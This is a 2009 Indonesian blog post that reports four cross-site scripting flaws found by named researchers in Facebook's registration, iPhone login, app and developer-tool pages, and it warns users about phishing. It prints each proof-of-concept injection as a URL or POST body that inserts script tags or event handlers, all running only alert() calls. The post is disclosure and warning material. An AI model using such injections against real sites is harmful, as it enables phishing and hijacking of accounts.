Tuesday, July 28, 2009

Kelemahan Facebook

naputra  |  at  11:35 PM  | 1 comment


Para pengguna Facebook rentan akan serangan phishing dan pencurian ID dikarenakan munculnya kelemahan cross-site scripting yang terbaru dan cukup kritis.

Peneliti keamanan Zeitjak, David Wharton, Daimon dan p3lo baru-baru ini menemukan cacat XSS yang berpengaruh terhadap beberapa fungsionalitas Facebook termasuk halaman developer, halaman registrasi pengguna baru, halaman login iphone dan halaman aplikasi.



Orang-orang jahat dapat mengeksploitasi bugs XSS ini untuk menginfeksi jutaan anggota Facebook dengan malware, adware dan spyware.

Biar aman, anda dianjurkan untuk tidak menerima friend invitation dari orang yang tidak anda kenal. Alasannya adalah bahwa profil di Facebook berisikan informasi pribadi yang cukup berharga untuk dipelajari oleh fraudster (teman anda yang tidak dikenal). Para teman yang tak 'diundang' ini bertujuan untuk melancarkan serangan phishing atau menyebarkan malware pada pengguna individual maupun bisnis. Bagaimana jika anda mengklik sebuah shared link atau apapun? Maka siap-siap saja privasi anda akan menjadi milik mereka!!!

Berikut ini keempat cacat XSS yang ditemukan, untuk mengetahui seperti apa cacatnya klik link bertuliskan Mirror:

XSS #1 dengan POST (oleh Zeitjak) | Mirror:

http://www.new.facebook.com/r.php

POST: reg_email__="onmouseover="alert('XSS - ZJ')"foo="bar

XSS #2 dengan POST (oleh David Wharton) | Mirror:

https://login.facebook.com/login.php?iphone&next=http%3A%2F%2Fiphone.fac...

POST:

email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login

XSS #3 (oleh DaiMon) | Mirror:

http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E

This one works on another IP (67.228.87.82) and can't be used for a worm, except a phishing one.

XSS #4 dengan POST (oleh p3lo) | Mirror:

http://developers.facebook.com/tools.php?fbml

POST:

profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=


Tags:
About the Author

Write admin description here..

1 comment:

Mohon Beri Komentar jika anda menyukainya

Copyright © 2013 FORBIANA. WP Theme-junkie converted by BloggerTheme9
Blogger template. Proudly Powered by Blogger.